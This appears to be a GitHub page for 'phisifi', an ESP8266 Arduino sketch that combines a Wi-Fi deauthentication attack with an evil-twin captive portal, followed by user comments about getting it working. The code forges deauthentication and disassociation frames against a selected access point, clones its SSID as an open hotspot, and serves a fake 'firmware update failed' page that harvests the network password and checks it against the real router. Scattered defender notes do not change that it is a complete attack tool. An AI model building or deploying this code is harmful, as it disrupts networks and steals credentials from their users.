p3tr0s / phisifi Goto Github PK
WiFi Hacking with an ESP8266 - Deauth combined with Evil Twin attack
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <ESP8266HTTPClient.h>
extern "C" {
#include "user_interface.h"
}
// One scanned access point, as recorded by performScan().
typedef struct
{
String ssid; // network name, taken from WiFi.SSID(i)
uint8_t ch; // radio channel, taken from WiFi.channel(i)
uint8_t bssid[6]; // 6-byte BSSID, copied byte by byte from WiFi.BSSID(i)
} _Network;
// NOTE(review): DNS_PORT and apIP are not referenced in the visible code; the DNS server
// and the soft AP are started with the literals 53 and 192.168.4.1 instead.
const byte DNS_PORT = 53;
IPAddress apIP(192, 168, 1, 1);
// Started with the "*" wildcard in setup(), so every hostname a connected client looks up
// resolves to this device.
DNSServer dnsServer;
// Plain HTTP on port 80; the visible handlers perform no authentication.
ESP8266WebServer webServer(80);
// Fixed-size table of scan results (at most 16 entries).
_Network _networks[16];
// Entry chosen through the "ap" request argument; it supplies the SSID, channel and BSSID
// used by the rest of the sketch.
_Network _selectedNetwork;
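// Resets every slot of the scan table to an empty entry.
// A value-initialized _Network() is assigned so that ch and bssid are zeroed along with the
// SSID; a default-initialized local (`_Network n;`) leaves those two members holding
// whatever was on the stack and would copy that into the table.
void clearArray() {
  for (int i = 0; i < 16; i++) {
    _networks[i] = _Network();
  }
}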
// Text appended to the control page inside an <h3> element when non-empty (see
// handleIndex()); the code that assigns it is not visible in this listing.
String _correct = "";
// Last value received in the "password" request argument of the portal form.
String _tryPassword = "";
// Default main strings
#define SUBTITLE "ACCESS POINT RESCUE MODE"
#define TITLE "⚠ Firmware Update Failed"
#define BODY "Your router encountered a problem while automatically installing the latest firmware update.
To revert the old firmware and manually update later, please verify your password."
String header(String t) {
String a = String(_selectedNetwork.ssid);
String CSS = "article { background: #f2f2f2; padding: 1.3em; }"
"body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }"
"div { padding: 0.5em; }"
"h1 { margin: 0.5em 0 0 0; padding: 0.5em; font-size:7vw;}"
"input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; border-radius: 10px; }"
"label { color: #333; display: block; font-style: italic; font-weight: bold; }"
"nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }"
"nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } "
"textarea { width: 100%; }"
;
String h = ""
"<title>
String footer() {
return "
String index() {
return header(TITLE) + "
// One-time initialisation: serial console, radio mode, management access point,
// wildcard DNS and HTTP routes.
void setup() {
Serial.begin(115200);
// AP+STA: the device serves its own access point while the station interface stays
// available for scanning and for the WiFi.begin() join attempt made in handleIndex().
WiFi.mode(WIFI_AP_STA);
wifi_promiscuous_enable(1);
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
// Management AP. SSID and passphrase are fixed strings in the source, so this SSID is a
// usable wireless-survey indicator for a device running the sketch as published.
WiFi.softAP("WiPhi_34732", "Op00000000");
// "*" makes the DNS server answer every query with 192.168.4.1 (captive-portal pattern):
// whatever hostname a connected client resolves, it reaches this web server.
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
webServer.on("/", handleIndex);
webServer.on("/result", handleResult);
webServer.on("/admin", handleAdmin);
// Every unknown path is served by handleIndex as well.
webServer.onNotFound(handleIndex);
webServer.begin();
}
// Refreshes _networks from a Wi-Fi scan. The table is cleared first, then at most 16
// results are copied (SSID, BSSID, channel); any further results are dropped.
void performScan() {
int n = WiFi.scanNetworks();
clearArray();
// The scan result is only used when non-negative; a negative value leaves the table cleared.
if (n >= 0) {
for (int i = 0; i < n && i < 16; ++i) {
_Network network;
network.ssid = WiFi.SSID(i);
// WiFi.BSSID(i) is indexed as a byte array; the 6 bytes are copied one at a time.
for (int j = 0; j < 6; j++) {
network.bssid[j] = WiFi.BSSID(i)[j];
}
network.ch = WiFi.channel(i);
_networks[i] = network;
}
}
}
// Runtime toggles, flipped through the "hotspot" and "deauth" request arguments.
bool hotspot_active = false; // true while the soft AP advertises the selected network's SSID
bool deauthing_active = false; // true while loop() sends deauthentication/disassociation frames
void handleResult() {
String html = "";
if (WiFi.status() != WL_CONNECTED) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
webServer.send(200, "text/html", "<script> setTimeout(function(){window.location.href = '/';}, 4000); </script>
Please, try again.
");String _tempHTML = ""
"<style> .content {max-width: 500px;margin: auto;}table, th, td {border: 1px solid black;border-collapse: collapse;padding-left:10px;padding-right:10px;}</style>"
"
// Handler for "/" and for every unknown path. What it serves depends on hotspot_active:
// the operator's control page (network table and toggles) while false, the
// credential-prompt page while true.
// The control arguments "ap", "deauth" and "hotspot" are processed first and without any
// authentication, so every client that can reach the web server can send them.
void handleIndex() {
// "ap": select the scanned network whose formatted BSSID equals the argument.
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
// "deauth": start/stop the frame transmission performed in loop().
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
// "hotspot": tear down the soft AP and bring it back under a different identity.
// This branch returns without sending any HTTP response.
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
// The soft AP is re-created under the selected network's SSID. softAP() is called
// without a passphrase, so the copy is an open network. Defender note: an open AP
// advertising the SSID of a protected network is a security-type mismatch that wireless
// IDS rules and client OS warnings key on.
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
// Back to the fixed management SSID and passphrase used in setup().
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
if (hotspot_active == false) {
// Control page: _tempHTML plus one table row per scanned network.
String _html = _tempHTML;
for (int i = 0; i < 16; ++i) {
// An empty SSID is treated as the end of the table.
if ( _networks[i].ssid == "") {
break;
}
// NOTE(review): the SSID comes from whatever access points are in radio range and is
// concatenated into the HTML without escaping, so a crafted SSID can inject markup
// into this page.
_html += "<tr><td>" + _networks[i].ssid + "</td><td>" + bytesToStr(_networks[i].bssid, 6) + "</td><td>" + String(_networks[i].ch) + "<td><form method='post' action='/?ap=" + bytesToStr(_networks[i].bssid, 6) + "'>";
if (bytesToStr(_selectedNetwork.bssid, 6) == bytesToStr(_networks[i].bssid, 6)) {
_html += "<button style='background-color: #90ee90;'>Selected</button></form></td></tr>";
} else {
_html += "<button>Select</button></form></td></tr>";
}
}
// Fill the {placeholder} tokens of the template according to the current toggles.
if (deauthing_active) {
_html.replace("{deauth_button}", "Stop deauthing");
_html.replace("{deauth}", "stop");
} else {
_html.replace("{deauth_button}", "Start deauthing");
_html.replace("{deauth}", "start");
}
// hotspot_active is false throughout this branch, so only the else arm below can run.
if (hotspot_active) {
_html.replace("{hotspot_button}", "Stop EvilTwin");
_html.replace("{hotspot}", "stop");
} else {
_html.replace("{hotspot_button}", "Start EvilTwin");
_html.replace("{hotspot}", "start");
}
// With no network selected the {disabled} token becomes the HTML "disabled" attribute.
if (_selectedNetwork.ssid == "") {
_html.replace("{disabled}", " disabled");
} else {
_html.replace("{disabled}", "");
}
_html += "</table>";
if (_correct != "") {
_html += "</br><h3>" + _correct + "</h3>";
}
_html += "</div></body></html>";
webServer.send(200, "text/html", _html);
} else {
// Portal mode: clients of the cloned SSID land here for every URL they request.
if (webServer.hasArg("password")) {
// The submitted value is kept and then checked by trying to join the selected
// network with it from the station interface.
_tryPassword = webServer.arg("password");
// NOTE(review): frame transmission is paused around the join attempt only when the
// request itself carries deauth=start; whether the portal form sends that argument is
// not visible here.
if (webServer.arg("deauth") == "start") {
deauthing_active = false;
}
delay(1000);
WiFi.disconnect();
WiFi.begin(_selectedNetwork.ssid.c_str(), webServer.arg("password").c_str(), _selectedNetwork.ch, _selectedNetwork.bssid);
// Interim page; its script redirects the browser to /result after 15 seconds.
webServer.send(200, "text/html", "<!DOCTYPE html> <html><script> setTimeout(function(){window.location.href = '/result';}, 15000); </script></head><body><center><h2 style='font-size:7vw'>Verifying integrity, please wait...<br><progress value='10' max='100'>10%</progress></h2></center></body> </html>");
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
}
} else {
// No "password" argument: serve the prompt page built by index().
webServer.send(200, "text/html", index());
}
}
}
void handleAdmin() {
String _html = _tempHTML;
if (webServer.hasArg("ap")) {
for (int i = 0; i < 16; i++) {
if (bytesToStr(_networks[i].bssid, 6) == webServer.arg("ap") ) {
_selectedNetwork = _networks[i];
}
}
}
if (webServer.hasArg("deauth")) {
if (webServer.arg("deauth") == "start") {
deauthing_active = true;
} else if (webServer.arg("deauth") == "stop") {
deauthing_active = false;
}
}
if (webServer.hasArg("hotspot")) {
if (webServer.arg("hotspot") == "start") {
hotspot_active = true;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP(_selectedNetwork.ssid.c_str());
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
} else if (webServer.arg("hotspot") == "stop") {
hotspot_active = false;
dnsServer.stop();
int n = WiFi.softAPdisconnect (true);
Serial.println(String(n));
WiFi.softAPConfig(IPAddress(192, 168, 4, 1) , IPAddress(192, 168, 4, 1) , IPAddress(255, 255, 255, 0));
WiFi.softAP("WiPhi_34732", "Op00000000");
dnsServer.start(53, "*", IPAddress(192, 168, 4, 1));
}
return;
}
for (int i = 0; i < 16; ++i) {
if ( _networks[i].ssid == "") {
break;
}
_html += "
SSID | BSSID | Channel | Select |
---|---|---|---|
" + _networks[i].ssid + " | " + bytesToStr(_networks[i].bssid, 6) + " | " + String(_networks[i].ch) + " | ";
} if (deauthing_active) { if (hotspot_active) { if (_selectedNetwork.ssid == "") { if (_correct != "") { " + _correct + "";} _html += " |
}
// Formats `size` bytes starting at `b` as two-digit hexadecimal groups separated by ':'
// (the usual MAC/BSSID notation). Returns an empty String when size is 0.
String bytesToStr(const uint8_t* b, uint32_t size) {
  String out;
  for (uint32_t idx = 0; idx < size; ++idx) {
    // Separator goes in front of every group except the first.
    if (idx != 0) {
      out += ':';
    }
    const uint8_t octet = b[idx];
    // Pad single-digit values so each group is always two characters wide.
    if (octet < 0x10) {
      out += '0';
    }
    out += String(octet, HEX);
  }
  return out;
}
// millis() timestamps of the last run of each periodic task in loop().
unsigned long now = 0; // last performScan() (15 s period)
unsigned long wifinow = 0; // last tick of the 2 s block
unsigned long deauth_now = 0; // last frame pair sent (200 ms period)
// Switches the radio to wifi_channel and hands a raw frame to the SDK for transmission.
// Returns true when wifi_send_pkt_freedom() returns 0, which this code treats as success.
// The channel number and, on success, the word "done" are written to the serial console.
bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t wifi_channel) {
Serial.println(wifi_channel);
// Serial.println(bytesToStr(packet, 26));
wifi_set_channel(wifi_channel);
bool sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
if (sent) Serial.println("done");
return sent;
}
// Main loop: services DNS and HTTP, sends a deauthentication/disassociation frame pair
// every 200 ms while deauthing_active is set, and rescans for networks every 15 s.
void loop() {
dnsServer.processNextRequest();
webServer.handleClient();
if (deauthing_active && millis() - deauth_now >= 200) {
// 26-byte 802.11 management frame. Field layout follows the annotations in the author's
// earlier commented-out draft of this code.
// Defender note: these are unauthenticated management frames carrying the access
// point's own address as source. Clients on networks that require 802.11w Protected
// Management Frames discard them, and a steady broadcast deauthentication/disassociation
// pair at this rate is a standard wireless-IDS signature.
uint8_t packet[26] = {
0xC0, 0x00, // 0-1: type/subtype, 0xC0 = deauthentication (0xA0 = disassociation)
0x00, 0x00, // 2-3: duration
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // 4-9: receiver, left as the broadcast address
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // 10-15: source, overwritten with the selected BSSID below
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // 16-21: BSSID, overwritten with the selected BSSID below
0x00, 0x00, // 22-23: fragment and sequence number
0x01, 0x00 // 24-25: reason code (1 = unspecified reason)
};
// NOTE(review): success is assigned but never read afterwards.
bool success = false;
memcpy(&packet[10], _selectedNetwork.bssid, 6);
memcpy(&packet[16], _selectedNetwork.bssid, 6);
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// Same frame re-sent with the subtype switched to disassociation.
packet[0] = 0xa0;
if (sendPacket(packet, sizeof(packet), _selectedNetwork.ch)) {
success = true;
}
// (Two commented-out earlier drafts of this frame-sending code stood here; they were
// never compiled and have been dropped from the listing.)
deauth_now = millis();
}
// Refresh the scan table every 15 seconds.
if (millis() - now >= 15000) {
performScan();
now = millis();
}
// Connection-status logging is commented out, so this block only resets its own timer.
if (millis() - wifinow >= 2000) {
// if (WiFi.status() != WL_CONNECTED) {
// Serial.println("BAD");
// } else {
// Serial.println("GOOD");
// }
wifinow = millis();
}
}
Esp8266 not starting automatically after user entering correct password. And when I reconnect esp8266 to power . It's not showing password.. even the default AP' name is different like 'Fairy.......'
Bin file can be flashed with mobile. So please release the bin file.
How can I redo the "wifi" sign to make it more user-friendly?, seems like deauther doesn't work anymore!?...."I use google translate". Everything worked fine 🥹🥹
ap shows previous ap name tried full reset including nvm doesnt work
cant deauth.I think it is invalid.WI-PWN could work.so it doesn't matter with my board.
btw i use VScode to upload. and lib choose well